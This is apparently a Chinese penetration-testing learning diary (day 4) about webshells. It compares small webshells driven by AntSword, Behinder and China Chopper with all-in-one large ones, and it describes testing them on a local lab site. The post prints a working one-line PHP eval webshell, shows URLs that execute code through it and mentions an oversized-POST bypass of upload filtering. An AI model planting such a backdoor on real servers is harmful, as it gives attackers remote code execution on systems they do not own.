渗透学习日记day4

大马和小马

  •         小马体积比较小,需要配合第三方工具进行使用(antsword蚁剑,冰蝎,菜刀)
  •         大马体积一般比较大,所有功能集成在脚本之中,第三方软件来连接使用 

这里在github上找了一个大马下载下来上传到本地用小皮面板建的站目录下,在浏览器中输入站点名/dama/shell.php输入密码登录成功,里面是集成好了的功能直接使用。

同样的,自己写一个一句话php脚本,在浏览器中输入站点地址/1.php?1=phpinfo();输出php相关信息  || 或者是/1.php?echo%20123456输出123456

        

<?php

    eval($_GET[1]);    

?>

上面过程中,要自己输入自己指定的命令,若是对PHP语法不熟悉不知道code怎么写,我们可以使用第三方工具        比如Antsword/冰蝎/中国菜刀        复制具体地址(站点名/php脚本)

{http://localhost/1.php}

在上面的一句话中把$_GET改成$_POST

下载蚁剑

        蚁剑教程可以看这里,会有详细步骤。

        下载完毕后运行蚁剑,下一步右键添加数据,这里的连接密码就是之前$_POST[1]中的传参1

 

超长字符绕过:通过POST包上传百万字节以上,导致内核溢出绕过


补充内容:

       在Github上下载资源可以用Gitbash这个软件

        安装后可以在想下载资源的文件夹右键选择Gitbash ,输入命令git clone + 下图给的内容 

不过速度好像有点感人,我记得之前有看到一种在github上下载资源比较快的方法,好像是复制上面的内容在其他一些网站下会快一些,但是这里没有试验过


版权声明:本文为qq_44836237原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接和本声明。